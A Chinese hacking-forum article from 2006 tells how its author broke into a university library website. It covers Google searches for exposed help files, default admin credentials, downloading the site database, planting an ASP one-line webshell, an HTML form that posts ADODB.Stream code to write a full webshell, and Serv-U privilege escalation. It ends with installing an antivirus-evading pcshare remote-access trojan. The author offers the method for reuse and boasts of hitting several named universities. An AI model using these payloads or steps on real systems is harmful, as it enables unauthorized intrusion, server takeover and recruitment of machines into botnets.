黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]小思路得到大权限
      ★★★★★

小思路得到大权限

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-8-3 10:19:28

非常的无聊 GF又开始生气了 不知所措 无奈 郁闷的我 
拿起手上的 防线 和 黑客手册来打发时间

看到了一篇 又一篇文章 都是些老思路 没什么新意.... 
不过看到了一个 觉得可以利用的文章 (忘了是黑防还是 手册上的文章了)

作者是在baidu和google上搜索 inurl: read.txt 然后拿到一堆 webshell 

呵呵 这个家伙真是机灵 把我N年前的思路给搬到黑防上去了 早知道我应该申请专利


其实 大伙搜索 inurl:使用帮助.txt 这个会更有用的.... 会搜索出很多 中文的站点 

我今天实在郁闷到极点了,就上google一阵狂搜 翻了几十页后 突然眼睛一亮,发现了一个

www.xxx.edu.cn/lib/使用帮助.txt 

呵呵 这下它有的受了 
直接复制 上面的路径 IE打开后 按照里面的说明直接找到默认的管理员账号和密码,管理员账号和密码是:webadmin adminweb 默认路径为 login_webadmin.asp 打开后 麻木的把密码输入到框框 发现管理员密码不对 真是书山有路勤为径啊 一不小心发现了 web/data/database/db.lib/webadmin.asa 这不是传说中的 数据库么 ---------呵呵 得来全不费功夫. 复制好路径 打开显示乱码 这下好了 打开它的图书馆网站 注册会员后 找到可写的目录 插入 一句话 <%execute request("cnlnfjhh")%> 应该已经插到数据库中了 因为说明里面就只有这么一个默认数据库 呵呵

然后 把下面的 代码:

<form action=http://www.XXX.edu.cn/lib/xxx.asp method=post> //注:xxx.asp为数据库,也就 是你至少要知道数据库路径//
<textarea name=cnlnfjhh cols=120 rows=10 width=45> 
set lP=server.CreateObject("Adodb.Stream") 
lP.Open 
lP.Type=2 
lP.CharSet="gb2312" 
lP.writetext request("p") 
lP.SaveToFile server.mappath("temp.asp"),2 
lP.Close 
set lP=nothing 
response.redirect "temp.asp" 
</textarea> 
<textarea name=p cols=120 rows=10 width=45></textarea><BR><center><br> 
<input type=submit value=提交>”

保存为 html的页子 用记事本打开 把插入过马的 asp页子 替换上面的<form action=http://www.XXX.edu.cn/lib/xxx.asp method=post> 里的路径.

写入大马 submit 提交 呵呵 一个shell 到了 进去后翻了翻 服务器里有 serv-u 6.0.1 呵呵 找到 可写的目录 上传自己免杀的
su.exe 提权 然后 执行 偶Cn 自己免杀了快一年的一个 pcshare服务端 过了 半分钟 一个肉鸡 在客户端上 "咚咚"的上线了 
看了看配制 03的 2G内存 4块CPU 速度非常快~ 做了个代理 擦完PP 走人...................

上面是偶的入侵大概经过 方法是04年的 不过思路值得大家借鉴...呵呵 

由于很多 管理员用的整站程序 自己懒的修改一下 所以 里面默认的数据库和管理员 就会暴露出来.给我们的入侵 多了一个 旁器.

记得在04年的时候:西安交通大学 西北工业大学 清华大学的图书馆ect........ 都是我曾经通过此方法拿下的 汗一个 

把本文思路献给 偶们火狐和 CN群的朋友们 希望他们能多想出来更多的方法.提供给大家.

文章录入:cainiaowang    责任编辑:cainiaowang 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886